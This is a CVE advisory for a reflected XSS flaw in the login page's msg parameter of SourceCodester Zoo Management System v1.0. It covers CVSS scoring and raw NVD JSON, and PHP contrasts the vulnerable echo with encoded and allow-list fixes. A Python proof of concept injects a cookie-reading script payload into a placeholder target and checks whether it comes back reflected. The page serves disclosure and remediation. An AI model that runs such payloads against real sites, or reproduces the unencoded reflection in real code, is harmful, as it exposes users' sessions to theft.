Security Vulnerability Report
CVE-2026-30526 CVSS 6.1 MEDIUM

CVE-2026-30526

Published: 2026-04-01 15:22:59
Last Modified: 2026-05-10 14:16:50

Description

A Reflected Cross-Site Scripting (XSS) vulnerability exists in SourceCodester Zoo Management System v1.0. The vulnerability is located in the login page, specifically within the msg parameter. The application reflects the content of the msg parameter back to the user without proper HTML encoding or sanitization. This allows remote attackers to inject arbitrary web script or HTML via a crafted URL.
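The flaw described above is the familiar pattern of echoing a query parameter straight into the page. The PHP below is an added illustration, not the Zoo Management System's source: a reconstructed vulnerable handler for the login page's msg parameter beside two hardened forms, output encoding and a server-side allow-list that stops reflecting attacker-controlled text at all. The function names and the message codes are assumptions.

```php
<?php
// Added illustration of the pattern in the advisory; not the Zoo Management System source.

// VULNERABLE (reconstructed from the description): the msg query parameter is
// echoed into the login page unencoded, so a crafted URL injects markup.
function render_message_vulnerable(array $query): string
{
    $msg = (string) ($query['msg'] ?? '');
    return $msg === '' ? '' : '<div class="alert">' . $msg . '</div>';
}

// FIX 1: HTML-encode before placing untrusted text in element content.
// ENT_QUOTES also encodes quotes, so the same value is safe inside attributes.
function render_message_encoded(array $query): string
{
    $msg = (string) ($query['msg'] ?? '');
    if ($msg === '') {
        return '';
    }
    $safe = htmlspecialchars($msg, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<div class="alert">' . $safe . '</div>';
}

// FIX 2 (preferred): never reflect the parameter; treat msg as a short code
// and look the text up server-side. Unknown codes render nothing.
const LOGIN_MESSAGES = [
    'invalid'   => 'Invalid username or password.',
    'loggedout' => 'You have been logged out.',
];  // hypothetical codes, chosen for this illustration

function render_message_allowlist(array $query): string
{
    $code = (string) ($query['msg'] ?? '');
    if (!isset(LOGIN_MESSAGES[$code])) {
        return '';
    }
    return '<div class="alert">' . LOGIN_MESSAGES[$code] . '</div>';
}

// Self-check with a constructed request carrying the payload from the advisory's PoC.
$probe = ['msg' => '<script>alert(document.cookie)</script>'];
assert(str_contains(render_message_vulnerable($probe), '<script>'));
assert(!str_contains(render_message_encoded($probe), '<script>'));
assert(render_message_allowlist($probe) === '');
assert(render_message_allowlist(['msg' => 'invalid']) === '<div class="alert">Invalid username or password.</div>');
echo "encoded: ", render_message_encoded($probe), PHP_EOL;
```

The allow-list form is the stronger fix because it removes the reflection entirely; the encoding form is the minimal patch when the parameter must carry free text.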

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:pushpam02:zoo_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
SourceCodester Zoo Management System v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def verify_xss(target_url):
    # The vulnerable parameter is 'msg' on the login page
    # Using a simple script tag to test execution
    payload = '<script>alert(document.cookie)</script>'
    # Construct the full URL with the payload
    # Example: http://target/login.php?msg=<script>...
    params = {'msg': payload}
    try:
        response = requests.get(target_url, params=params, timeout=10)
        # Check if the payload is reflected in the response without encoding
        if payload in response.text:
            print('[+] Potential XSS found. Payload reflected unfiltered.')
            print('[+] Response URL:', response.url)
        else:
            print('[-] Payload not found in response or filtered.')
    except requests.exceptions.RequestException as e:
        print(f'Error connecting to target: {e}')


if __name__ == '__main__':
    # Replace with the actual target URL
    target = 'http://vulnerable-site/zms/login.php'
    verify_xss(target)
```

References

- https://github.com/meifukun/Web-Security-PoCs/blob/main/Zoo-Management-System/Reflected-XSS-Login-msg.md (Exploit, Third Party Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-30526",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-01T15:22:59.277",
    "lastModified": "2026-05-10T14:16:49.530",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A Reflected Cross-Site Scripting (XSS) vulnerability exists in SourceCodester Zoo Management System v1.0. The vulnerability is located in the login page, specifically within the msg parameter. The application reflects the content of the msg parameter back to the user without proper HTML encoding or sanitization. This allows remote attackers to inject arbitrary web script or HTML via a crafted URL."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-79"}]
      },
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-79"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:pushpam02:zoo_management_system:1.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "BE938678-CB95-443D-BD7B-0F526B65A074"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/meifukun/Web-Security-PoCs/blob/main/Zoo-Management-System/Reflected-XSS-Login-msg.md",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      }
    ]
  }
}
```